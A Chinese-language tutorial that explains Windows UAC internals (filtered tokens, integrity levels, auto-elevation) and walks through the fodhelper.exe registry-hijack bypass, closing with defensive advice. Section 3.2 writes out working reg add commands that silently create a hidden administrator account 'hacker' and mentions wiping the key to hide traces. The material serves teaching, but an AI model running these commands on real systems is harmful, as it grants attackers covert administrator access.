Windows UAC机制原理与Bypass提权基础

在前面的文章中，我们剖析了 Token、DACL 以及认证体系。但在 Windows Vista 之后的现代操作系统中，即便你通过了 NTLM 认证，拿着属于 Administrators 组的 Token 成功登录，你依然会发现：

为什么在 C 盘根目录创建一个文件会提示“需要管理员权限”？
为什么双击运行某些程序时，屏幕会突然变暗，并弹出一个黄蓝相间的盾牌让你点击“是”？

这就是微软为了防止恶意软件在后台静默破坏系统，而引入的极其重要的安全机制——UAC（User Account Control，用户账户控制）。本文将揭开 UAC 的底层运转逻辑，并解析黑客是如何利用系统机制漏洞实现 Bypass UAC 提权的。

1. UAC 的底层逻辑：双重令牌与完整性级别

UAC 的核心思想是**“权限剥夺与按需提升”**。

1.1 Filtered Token (过滤后的令牌)

当一个属于管理员组的用户（如 Alice）登录 Windows 时，本地安全机构（LSASS）在给她颁发 Token 时做了一个手脚：它同时颁发了两个 Token！

Full Token (完整令牌)：包含 Alice 所有的特权和 Administrator 组的 SID。
Filtered Token (过滤令牌)：剥夺了 Administrator 组的 SID，并移除了大部分危险的系统特权（如 SeDebugPrivilege）。

在默认情况下，Alice 启动的所有进程（如 Explorer.exe 桌面、记事本、浏览器）都是使用这个Filtered Token运行的。这就是为什么明明你是管理员，却无法修改 C 盘系统文件的原因——你此刻的身份等同于一个普通标准用户。

1.2 强制完整性控制 (MIC, Mandatory Integrity Control)

除了 DACL，Windows 还引入了一套纵深防御机制：完整性级别 (Integrity Level, IL)。它为所有的进程和对象（文件/注册表）打上了一个“等级标签”：

System (系统级)：内核、系统服务（如 LSASS）。
High (高级)：以“管理员身份运行”的程序。
Medium (中级)：普通用户程序（如 Explorer.exe 默认状态）。
Low (低级)：沙盒环境（如浏览器的渲染进程）。

MIC 的铁律是：No Write Up（禁止向上写入）。低级别的进程，即使 DACL 允许，也绝对禁止修改高级别的对象。

💻 实战接触：查看进程的完整性级别 在 CMD 中执行 whoami /groups，找到 Mandatory Label 这一行：
C:\> whoami /groups

组信息
-----------------
组名                                 类型             SID          属性
==================================== ================ ============ ==========================
...
Mandatory Label\Medium Mandatory Level 标签             S-1-16-8192
这里的 Medium 说明你当前所在的 CMD 进程是一个被 UAC 过滤过的中完整性进程，没有真管理员权限。

1.3 UAC 弹窗的本质 (Elevation)

当你右键某个程序选择**“以管理员身份运行”**时，实际上是触发了 UAC 提权 (Elevation)。系统会暂停当前桌面（这就是屏幕变暗的 Secure Desktop 机制），弹出一个对话框询问用户。如果你点击了“是”，系统内核（通过 appinfo 服务）就会掏出你登录时雪藏的那个 Full Token，并以此创建一个 High IL（高完整性） 的进程。此时，你才真正获得了操作系统的掌控权。

2. Auto-Elevation (自动提权) 机制的后门

如果每一次管理员操作都要弹窗，用户肯定会疯掉（Vista 时代就因为弹窗太多被骂惨了）。于是从 Windows 7 开始，微软妥协了，引入了一个极其致命的机制：Auto-Elevation (自动提权)。

2.1 什么是自动提权？

Windows 允许某些系统自带的白名单程序（如任务管理器 taskmgr.exe、事件查看器 eventvwr.exe、系统配置工具 fodhelper.exe 等）在启动时，静默、自动地从 Medium 提升到 High 级别，完全不弹出 UAC 提示框！

触发 Auto-Elevation 的条件：

程序的发布者签名必须是合法的 Microsoft Windows 签名。
程序清单 (Manifest) 文件中必须包含 autoElevate=true 属性。
程序通常位于受信任的目录（如 C:\Windows\System32）。

2.2 黑客眼中的提权跳板

既然这些白名单程序能不弹窗就拿到高权限，那如果黑客能劫持这些白名单程序的执行流，让它们在启动时顺便帮黑客执行一下木马或命令，黑客的木马不就也静默地拿到高权限了吗？这就是大名鼎鼎的 Bypass UAC（绕过用户账户控制） 攻击！

3. Bypass UAC 提权实战剖析：以 fodhelper.exe 为例

fodhelper.exe（管理可选功能的程序）是绕过 UAC 最经典的白名单程序之一。我们来看看它是如何被利用的。

3.1 漏洞原理：注册表劫持

当 fodhelper.exe 启动时，它会自动提权为 High IL。随后，它在内部逻辑中需要启动另一个进程。为了找到要启动的程序路径，fodhelper.exe 会去查询当前用户的注册表（HKCU）。具体来说，它会去查询： HKCU\Software\Classes\ms-settings\Shell\Open\command

如果这个注册表键不存在，它会回退去查询系统级的注册表（HKLM）。 关键破绽在于： 当前用户（Medium 权限）虽然不能修改 C 盘文件，但完全有权限修改自己的 HKCU 注册表！

3.2 攻击步骤还原

攻击者在一个 Medium 权限的反弹 Shell 中，执行以下操作：

写入恶意指令：在 HKCU 中创建上述注册表路径，并将其默认值设置为攻击者想要执行的高权限命令（如添加一个隐藏管理员账号，或反弹一个高权限 Shell）。
```
C:\> reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "cmd.exe /c net user hacker P@ssw0rd /add & net localgroup administrators hacker /add" /f
```
绕过隔离机制：为了绕过某些安全机制，还需要添加一个 DelegateExecute 的空键值。
```
C:\> reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /f
```
触发白名单程序：直接运行 fodhelper.exe。
```
C:\> fodhelper.exe
```

底层发生的故事： fodhelper.exe 启动 -> 静默自动提权到 High IL -> 查询 HKCU 注册表 -> 发现黑客写入的 cmd.exe 命令 -> 以 High IL 身份执行该命令！整个过程没有任何 UAC 弹窗，攻击者成功将 Medium 权限的 Shell 提升为了 High 权限。 （最后，攻击者还要悄悄删掉这个注册表键以清理痕迹）。

4. 总结与防御

UAC 并不是一个绝对的安全边界（Security Boundary），微软官方多次重申，Bypass UAC 甚至都不被算作一个合格的 CVE 漏洞，因为触发它的前提是你已经拥有了一个 Administrator 组的普通 Token。

然而，在红队渗透中，Bypass UAC 依然是极其关键的一环，它是连接“初始立足点（Initial Access）”与“彻底控制系统（System Takeover）”的必经之路。

防御视角的思考：

最高防御：将 UAC 设置级别拉到最高（始终通知）。这会禁用自动提权机制，杜绝绝大部分 Bypass 攻击，但牺牲了用户体验。
根本防御：最小权限原则。日常办公使用标准用户（Standard User）登录，彻底剥夺 Administrator Token，此时所有的 Bypass UAC 技巧都将无用武之地，因为内核根本无权可提。

阶段性里程碑：至此，我们完成了**【操作系统安全 - Windows 篇】**的三大基石构建。从访问控制（Token/DACL）、到认证流转（NTLM/Kerberos）、再到系统防御机制（UAC）。
接下来，我们将切换阵营，进入企服和云原生世界的霸主——【Linux 安全篇】，探索 UGO 权限模型、PAM 认证框架以及 Capabilities 提权等硬核机制！